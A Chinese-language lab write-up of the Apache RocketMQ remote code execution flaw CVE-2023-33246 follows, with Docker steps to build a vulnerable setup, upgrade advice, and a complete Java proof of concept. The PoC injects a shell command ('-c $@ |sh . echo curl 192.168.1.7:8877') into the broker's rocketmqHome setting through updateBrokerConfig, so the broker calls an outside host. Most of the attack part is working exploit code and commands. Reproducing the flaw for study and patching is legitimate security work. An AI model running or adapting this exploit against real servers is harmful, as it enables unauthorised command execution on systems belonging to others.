RocketMQ远程代码执行(CVE-2023-33246) 前言 RocketMQ的NameServer、Broker、Controller等多个组件暴露在外网且缺乏权限验证,攻击者可以利用该漏洞利用更新配置功能以RocketMQ运行的系统用户身份执行命令。
详情:https://mp.weixin.qq.com/s/FZ3NyR8YnqWHn1pv_Dmtyg
影响版本 1 2 Apache RocketMQ <= 5.1.0 Apache RocketMQ <= 4.9.5
环境搭建 下载镜像
1 2 docker pull apache/rocketmq:4.9.1 docker pull apacherocketmq/rocketmq-console:2.0.0
启动namesrv
1 docker run -d -p 9876:9876 -v /data/namesrv/logs:/root/logs -v /data/namesrv/store:/root/store --name rmqnamesrv -e "MAX_POSSIBLE_HEAP=100000000" apache/rocketmq:4.9.1 sh mqnamesrv
创建目录
1 mkdir -p /mydata/rocketmq/conf/
在宿主机创建broker配置文件, 启动broker服务需要,我这里的路径为: /mydata/rocketmq/conf/broker.conf
文件内容(vim /mydata/rocketmq/conf/broker.conf)
1 2 3 4 5 6 7 8 brokerClusterName = DefaultCluster brokerName = broker-a brokerId = 0 deleteWhen = 04 fileReservedTime = 48 brokerRole = ASYNC_MASTER flushDiskType = SYNC_FLUSH brokerIP1 = 192.168.88.104
注:192.168.88.104为我的宿主机IP
启动broker
1 docker run -d -p 10911:10911 -p 10909:10909 -v /data/broker/logs:/root/logs -v /data/broker/store:/root/store -v /mydata/rocketmq/conf/broker.conf:/opt/rocketmq/conf/broker.conf --name rmqbroker --link rmqnamesrv:namesrv -e "NAMESRV_ADDR=namesrv:9876" -e "MAX_POSSIBLE_HEAP=200000000" apache/rocketmq:4.9.1 sh mqbroker -c /opt/rocketmq/conf/broker.conf
启动console
1 2 3 4 docker run -d --name rmqconsole -p 8899:8080 --link rmqnamesrv:namesrv\ -e "JAVA_OPTS=-Drocketmq.namesrv.addr=192.168.88.104:9876\ -Dcom.rocketmq.sendMessageWithVIPChannel=false" \ -t apacherocketmq/rocketmq-console:2.0.0
访问http://192.168.88.104:8899
POC攻击 下载地址:
1 https://github.com/I5N0rth/CVE-2023-33246
mqrce.java
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 package org.example; import org.apache.rocketmq.tools.admin.DefaultMQAdminExt; import java.util.Properties; /** * Created by IntelliJ IDEA. * * @Author: Garck3h * @Date: 2023/5/31 * @Time: 20:22 * Life is endless, and there is no end to it. **/ public class mqrce { public static void main(String[] args) throws Exception { String[] urls = {"192.168.88.104:8899" }; for (int i = 0; i < urls.length; i++) { updateConfig(urls[i]); } } public static void updateConfig(String url) throws Exception { Properties props = new Properties(); props.setProperty("rocketmqHome" ,"-c $@ |sh . echo curl 192.168.1.7:8877" ); props.setProperty("filterServerNums" ,"1" ); // 创建 DefaultMQAdminExt 对象并启动 DefaultMQAdminExt admin = new DefaultMQAdminExt(); admin.setNamesrvAddr("192.168.88.104:9876" ); admin.start(); // 更新配置⽂件 admin.updateBrokerConfig(url, props); Properties brokerConfig = admin.getBrokerConfig(url); System.out.println(brokerConfig.getProperty("rocketmqHome" )); System.out.println(brokerConfig.getProperty("filterServerNums" )); // 关闭 DefaultMQAdminExt 对象 admin.shutdown(); } }
maven配置文件pom.xml
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 <?xml version="1.0" encoding="UTF-8" ?> <project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd" > <modelVersion>4.0.0</modelVersion> <groupId>org.example</groupId> <artifactId>test1</artifactId> <version>1.0-SNAPSHOT</version> <properties> <maven.compiler.source>8</maven.compiler.source> <maven.compiler.target>8</maven.compiler.target> <project.build.sourceEncoding>UTF-8</project.build.sourceEncoding> </properties> <dependencies> <dependency> <groupId>org.apache.rocketmq</groupId> <artifactId>rocketmq-tools</artifactId> <version>4.9.1</version> </dependency> </dependencies> </project>
修复建议 目前官方已发布安全修复更新,受影响用户可以升级到Apache RocketMQ 5.1.1或者4.9.6
https://rocketmq.apache.org/download/
